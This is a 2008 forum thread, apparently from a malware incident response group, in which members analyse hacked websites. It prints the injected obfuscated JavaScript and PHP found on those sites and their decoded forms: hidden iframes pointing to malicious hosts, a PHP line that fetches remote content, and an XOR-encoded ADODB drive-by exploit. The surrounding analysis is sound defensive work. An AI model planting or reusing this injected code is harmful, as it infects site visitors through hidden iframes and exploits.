|
Donation/Premium |
|
 |
|
|
|
|
|
|
|
|
|
| View previous topic :: View next topic |
| Author |
Message |
downie
PIRT Handler
Joined: May 19, 2006
Posts: 3983
|
 Posted: Mon Apr 14, 2008 3:35 am Post subject: Scholes for scandal |
|
|
hxxp://scholes-it.com/
first iframe is from
'hxxp://tapki.cn/1.html?'+Math.round(Math.random()*19680)+'f0c38680004'
and there are other lines of obfuscript, maybe all the same.
_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."
|
|
| Back to top |
|
 |
downie
PIRT Handler
Joined: May 19, 2006
Posts: 3983
|
|
| Back to top |
|
|
philipp2
Trooper
Joined: Apr 11, 2008
Posts: 22
Location: Germany
|
| Posted: Mon Apr 14, 2008 2:16 pm Post subject: |
|
|
hi downie,
i looked at those websites and found the following:
hxxp://bathroomrenovationsillawarra.com/
| Code: |
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%
74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%61%63%35%31%38%63%30%20%73%72%63%3d%5c
%27%68%74%74%70%3a%2f%2f%6c%61%63%6f%6e%69%63%73%6f%66%74%77%61%72%65%2e%6f%72%67%2f%73%2f%69%6e%2e%63%67%69
%3f%31%30%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%31%30%35%32
%30%29%2b%27%37%32%36%66%66%30%62%5c%27%20%77%69%64%74%68%3d%36%31%34%20%68%65%69%67%68%74%3d%31%38%30%20%73
%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
</script>
|
decodes to
| Code: |
window.status='Done';document.write('<iframe name=7ac518c0 src=\'http://laconicsoftware.org/s/in.cgi?10?'+Math.round(Math.random()*110520)+'726ff0b\' width=614 height=180 style=\'display: none\'></iframe>')
|
the visitor is then redirected from laconisoftware.org to
hxxp://all1info.biz/gpack/index.php
which is a Web Exploit Framework i think (http://www.secgeeks.com/gpack.html).
#####
hxxp://razzledazzlem.com/
decoded javascript:
| Code: |
<iframe src=http://google-analyze.com/stat.php width=1 height=1 style="display:none"></iframe>
|
this looks innocent, the visitor is redirected from hxxp://google-analyze.com/stat.php to
hxxp://scaned.info/tds/in.cgi?2 and then to
hxxp://google.ru
#####
hxxp://themetropoliscorporation.com/
| Code: |
<?php
eval(gzinflate(base64_decode("nZJBboNADEWvghBSoFGpmWHcRARyg0hdV+1oCk6hJQENDgmLhquXRZdBirq09e3
/vmXvGwgHpVmWYICFjjvM0apKtsCgRTXVWuXSwgCt4JiwkGn0nHgWSXbQxCewKgfSubA4SZAVyULn0EAhKE7dx9AMJrqco
/XL+Wp4XONAZJZZVrFpLW/tmDlO5mAaTb6r1Rfb4RqdLz+865l29joSj/Sxljen5OqhjsInN
/E6YGWhEkf81A2eJEM7oTGmd4ImXo0UHwVDqRvY6ymxGnC6QUziTyVJpR3bmo
7+rF2QeIS9MFDrVpXQ6hwbWcB0iMUi2TfW98pJV8keDRxUD50gPKSQ3Gpv7kK6ObpcBjMcTpg6eWn9xhbzKV5v7XwLnHf
H+8e7BAn1pvbdbeaGM1Shu9m6QfIL"))); ?>
|
decodes to
| Code: |
<?php if (@fopen('http://xepace.cn/11/1', 'r')){echo file_get_contents("http://xepace.cn/11/1");} ?>
|
hxxp://xepace.cn/11/1 includes only links to
xaknet.ru , xhost.su and dvweb.ru
there is also something that looks like traffic counting:
| Code: |
<script>function vVtdYxbbdbx(vytabdYaadt){ return(parseInt(vytabdYaadt,16));}function vydbYtbatyt(vYYYYbbyadt){ var vxyaYtdYVba='';for(vYbtdbabbYa=0; vYbtdbabbYa<vYYYYbbyadt.length; vYbtdbabbYa+=2){vxyaYtdYVba+=(String.fromCharCode(vVtdYxbbdbx(vYYYYbbyadt.substr(vYbtdbabbYa,2))));}return vxyaYtdYVba;} document.write(vydbYtbatyt('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65
202069643D227961567962567879596122206E616D653D227959566261647964797822207372633D22687474703A2F2F7265646469
692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E
646F6D28292A31383133292B2759796256746461617961222077696474683D2232353922206865696768743D223722207374796C65
3D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'));</script>
|
decoded:
| Code: |
<SCRIPT>window.status='Done';document.write('<iframe id="yaVybVxyYa" name="yYVbadydyx" src="http://reddii.org/traffic/ft04new/index.php?'+Math.round(Math.random()*1813)+'YybVtdaaya" width="259" height="7" style="display: none;"></iframe>')</SCRIPT>
|
and another obfuscated javascript, that might be really malicious:
| Code: |
<script type='text/javascript'>
<!--
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%65%63%35%33%36%31%66%20%73%72%63%3d%27
%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64
%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%31%35%30%34%29%2b%27%36%27%20%77%69%64%74%68%3d%36%39%36
%20%68%65%69%67%68%74%3d%37%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f
%49%46%52%41%4d%45%3e') );
//-->
</script>
|
decoded:
| Code: |
<IFRAME name=ec5361f src='http://tapki.cn/1.html?'+Math.round(Math.random()*51504)+'6' width=696 height=74 style='display: none'></IFRAME>
|
this site hxxp://tapki.cn/1.html serves another iframe, loading
hxxp://tapki.cn/ds/iframe.php
which then redirects to
hxxp://www.panel911.com/traffic/in.cgi?TFService
and again redirects to
hxxp://call-att.com/check/versionl.php?t=669
here we find the following code:
| Code: |
<iframe name=iframe1 width=1 height=1></iframe>
<iframe name=iframe2 width=1 height=1></iframe>
<script>
var currentSite = 0;
var sites = new Array();
sites[1]='./n14041.htm';
sites[2]='./n14042.htm';
function hbefertgrvfds() {
gbfgbsfdb++;
if (gbfgbsfdb<6) document.getElementById( "iframe"+gbfgbsfdb ).src = sites[gbfgbsfdb];
}
if (document.location.href!='sdfgdfgsdf')
setInterval( "hbefertgrvfds()", 5000 );
else alert ('sfgsdfgsdfg');
document.getElementById( "iframe"+"1" ).src = './n14041.htm';
</script>
|
which i dont understand yet 
same for the code in n14041.htm and n14042.htm
must be some malicious javascript 'in progress' :\
|
|
| Back to top |
|
|
downie
PIRT Handler
Joined: May 19, 2006
Posts: 3983
|
| Posted: Mon Apr 14, 2008 7:29 pm Post subject: |
|
|
Actually for hxxp://google-analyze.com/stat.php
(which isn't registered to Google of course)
I get (spoofing the headers appropriately)
| Code: | Location: http://scaned.info/tds/in.cgi?2
Location: http://google-analystic.com/in.cgi?13
<frameset rows="100%"><frame src="http://google-analystic.com/t.php"></frameset>
...
iframe src=http://trafagon.cn/gb/ width=1 height=1 style="display:none"></iframe>
<iframe src=http://tr.sforge.info/ts/in.cgi?notfound width=1 height=1 style="display:none"></iframe>
|
hxxp://trafagon.cn/gb/
then serves up
| Code: | | <html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(:�gtobuhno!ru`su)(!z�w`s!v`r!<!enbtldou/bsd`udDmdldou)&nckdbu&(:�v`r/rdu@uushctud)&he&-&v`r&(:�v`r/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:�usx!z�w`s!p!<!v`r/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:�w`s!r!<!v`r/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(:�w`s!u!<!v`r/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:�usx!z!u/uxqd!<!0:�p/nqdo)&F&*#D#*&U&-&iuuq;..us`g`fno/bo.fc.mn`e/qiq&-g`mrd(:�p/rdoe)(:!u/nqdo)(:�u/Vshud)p/sdrqnordCnex(:�w`s!o`ld!<!&/..//..hdyqHnsd/dyd&:�u/R`wdUnGhmd)o`ld-3(:�u/Bmnrd)(:�|!b`ubi)d(!z|�usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||�b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html> |
an obfuscated Adodb exploit;
and hxxp://tr.sforge.info/ts/in.cgi?notfound
produces
| Code: | Location: http://208.72.168.176/e_notf_12/index.php
...
<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(:��gtobuhno!ru`su)(!z��w`s!fff!<!enbtldou/bsd`udDmdldou)&nckdbu&(:��fff/rdu@uushctud)&he&-&fff&(:��fff/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:��usx!z��w`s!p!<!fff/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:��w`s!r!<!fff/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(:��w`s!u!<!fff/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:��usx!z!u/uxqd!<!0:��p/nqdo)&F&*#D#*&U&-&iuuq;..319/63/079/067.d^onug^03.mn`e/qiq&-g`mrd(:��p/rdoe)(:!u/nqdo)(:��u/Vshud)p/sdrqnordCnex(:��w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:��u/R`wdUnGhmd)o`ld-3(:��u/Bmnrd)(:��|!b`ubi)d(!z|��usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||��b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script><script type="text/javascript">if(window.location.hostname.search("spyshredder") < 0 && window.location.hostname.search("virtualpayr") < 0){location.replace("http://scanner.spyshredderscanner.com/14/?advid=4198&ref=2");}</script></head></html> "0">
<TR><TD CLASS=resultHeader ALIGN="CENTER" height=20>Result is not available</TD></TR>
</TABLE>
</BODY>
</HTML>
0
(33Nb28˚ ä∏sú}Òú`‰c�Û>�—|AßõÎI-◊Sá]ì…‘-eöAqnC6¿Úg*rX‡í¨23åö¡…5k�˝<3åÓÍIØRÌ◊≈�
Bu”Á”Á≤fi|â��‹ùπ„<{�†È@¯ß‚√«¸Kø�o˛Ωq6ªEºxŸ\¬H�Å�QíTÅœOC“¨≠–¡r5ç�Ú˙IR;sq�,ûSH�Ò!mŒ∏ç›A |
Adodb again.
Several of those URLs use IP logging, so if you don't get the code first time you need a proxy or renew your DHCP.
_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."
|
|
| Back to top |
|
|
philipp2
Trooper
Joined: Apr 11, 2008
Posts: 22
Location: Germany
|
| Posted: Mon Apr 14, 2008 8:10 pm Post subject: |
|
|
yes, you are right. i have overseen that.
all those iframes and javascripts are confusing me.
i just noticed that this google-analyze.com host is actually not innocent at all, while looking at the website you posted here:
 /t219663-Hard_cheese.html
same thing, but getting the malware from hxxp://google-analyze.com/counter/load.php
and using this host as a c&c
|
|
| Back to top |
|
|
tetak
MIRT Team Lead
Premium Member
Joined: Jan 19, 2007
Posts: 5879
|
|
| Back to top |
|
|
|
|
|
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum
|
Powered by phpBB © 2001 phpBB Group
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
